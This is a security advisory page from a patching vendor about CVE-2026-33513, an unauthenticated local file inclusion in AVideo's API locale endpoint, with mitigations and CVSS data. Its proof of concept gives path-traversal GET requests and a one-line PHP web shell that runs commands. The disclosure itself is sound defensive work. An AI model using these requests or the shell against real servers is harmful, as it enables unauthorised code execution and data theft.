Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2026-33513

AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)
Back to all
CVE

CVE-2026-33513

AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)

Summary

An unauthenticated API endpoint (APIName=locale) concatenates user input into an include path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., view/about.php), and it can escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. 

Details

  • Entry point: plugin/API/get.json.php sets $global['bypassSameDomainCheck']=1 and merges GET/POST/JSON into $parameters without authentication or API secret.
  • Handler: plugin/API/API.php, method getapilocale() (lines ~5009–5023):

  ```php

  $parameters['language'] = strtolower($parameters['language']);

  $file = "{$global['systemRootPath']}locale/{$parameters['language']}.php";

  if (!file_exists($file)) { return new ApiObject("This language does not exists"); }

  include $file;

  ```

  No validation is performed; ../ traversal is accepted.

  • Because include executes PHP, any reachable PHP file is executed in the web server context.

PoC

  1. Fetch an arbitrary PHP file (no auth):

   ```

   GET /plugin/API/get.json.php?APIName=locale&language=../view/about HTTP/1.1

   Host: <target>

   ```

   Response returns the rendered About page HTML, proving traversal outside locale/.

  1. RCE with an attacker PHP file (any writable PHP path):

   ```

   GET /plugin/API/get.json.php?APIName=locale&language=../videos/locale/shell&x=whoami

   ```

   If shell.php contains <?php system($_GET['x']); ?>, the response includes command output.

Impact

  • Unauthenticated file inclusion of arbitrary PHP files under the web root.
  • Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.
  • Potential RCE if any attacker-writable PHP file exists elsewhere (not confirmed in this build).
  • Affects any deployment with the API plugin enabled (default in docker-compose).

Mitigation

  • Reject path separators/dots and enforce a strict allowlist of locale slugs.
  • realpath the target and ensure it stays within $systemRootPath/locale.
  • Stop using include for translations; load data from vetted formats (JSON/array).
  • Add authentication (API secret/token) to the endpoint as a secondary control.

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
8.6
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
C
H
U
-

Related Resources

No items found.

References

https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m, https://nvd.nist.gov/vuln/detail/CVE-2026-33513, https://github.com/WWBN/AVideo

Severity

8.6

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
8.6
EPSS Probability
0.00329%
EPSS Percentile
0.55926%
Introduced Version
0
Fix Available

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading